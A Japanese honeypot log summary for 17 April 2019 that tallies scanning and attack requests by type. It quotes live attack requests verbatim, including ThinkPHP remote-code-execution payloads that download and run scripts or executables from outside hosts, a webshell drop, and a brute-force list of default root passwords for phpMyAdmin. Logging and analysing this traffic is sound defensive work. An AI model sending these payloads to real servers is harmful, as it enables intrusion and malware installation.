BW-Potのログ分析 (2019/04/17)
本日の総アクセス件数は494件です。送信元IP数は81IPです。
以下のpathに同一IPから来ていたので、すべてVOIP関連と判断しています。
- /aastra/
- /configs/
- /gs/
- /lib/
- /polycom/
- /provision/
- /provisioning/
- /spa/
- /spa2102/
- /tftp/
- /voip_provisioning/
- /xmlservices/
| 件数 | 種別 | リクエスト |
| 293 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 73 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 59 | アクセス | GET / |
| 2 | 不正中継の調査 | POST 188.166.41[.]194/tmUnblock.cgi |
| 2 | phpMyAdminに関する調査 | GET /phpMyAdmin/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET /phpmyadmin/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET /pma/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 2 | クローリング | GET /robots.txt |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
| 1 | 不正中継の調査 | GET api.huobi[.]pro/market/detail?symbol=ethusdt |
| 1 | 不正中継の調査 | GET www.binance[.]com/api/v1/ticker/bookTicker?symbol=ETHBTC |
| 1 | Apache Struts 2に関する調査 | GET /index.action |
| 1 | Apache Struts 2に関する調査 | GET /struts2-rest-showcase/orders.xhtml |
| 1 | Apache Strutsに関する調査 | GET /index.do |
| 1 | DFindによるスキャン | GET /w00tw00t.at.ISC.SANS.DFind:) |
| 1 | Kubernetesに関する調査 | GET /api/v1/overview/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp |
| 1 | ThinkPHPに関する攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20hxxp://81.6.42[.]123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; |
| 1 | ThinkPHPに関する攻撃 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php |
| 1 | ThinkPHPに関する攻撃 | GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/iqvaiqxsywjnwem15275.exe');start%20C:/Windows/temp/iqvaiqxsywjnwem15275.exe |
| 1 | ThinkPHPに関する攻撃 | GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/iqvaiqxsywjnwem15275.exe');start%20C:/Windows/temp/iqvaiqxsywjnwem15275.exe |
| 1 | WordPressに関する調査 | GET /wp-login.php |
| 1 | WordPressのユーザー情報の取得 | GET ///?author=1 |
| 1 | WordPressのユーザー情報の取得 | GET ///wp-json/wp/v2/users/ |
| 1 | WordPressのユーザー情報の取得 | GET /wp-json/wp/v2/users/ |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=168168&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=MySQL&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=Ucloud.cn&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=access&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=admin&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=admin123&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=apache&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=autoset&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=database&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=huweishen.com&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=master&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=mysql&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=mysql123&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=oracle&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=r00t&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=redhat&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=root&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=toor&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=user&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=wdlinux.cn&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=websoft9&server=1 |
| 1 | phpMyAdminに関する調査 | GET /pmamy2/index.php |
| 1 | phpMyAdminに関する調査 | GET /MyAdmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /myadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /phpmy/scripts/setup.php |
| 1 | アクセス | HEAD / |
| 1 | VOIPに関する調査 | GET /aastra/ |
| 1 | VOIPに関する調査 | GET /configs/ |
| 1 | VOIPに関する調査 | GET /gs/ |
| 1 | VOIPに関する調査 | GET /lib/ |
| 1 | VOIPに関する調査 | GET /polycom/ |
| 1 | VOIPに関する調査 | GET /provision/ |
| 1 | VOIPに関する調査 | GET /provisioning/ |
| 1 | VOIPに関する調査 | GET /spa/ |
| 1 | VOIPに関する調査 | GET /spa2102/ |
| 1 | VOIPに関する調査 | GET /tftp/ |
| 1 | VOIPに関する調査 | GET /voip_provisioning/ |
| 1 | VOIPに関する調査 | GET /xmlservices/ |
| 1 | WebDAVに関する調査 | GET /webdav/ |
| 1 | 不明 | PROPFIND / |
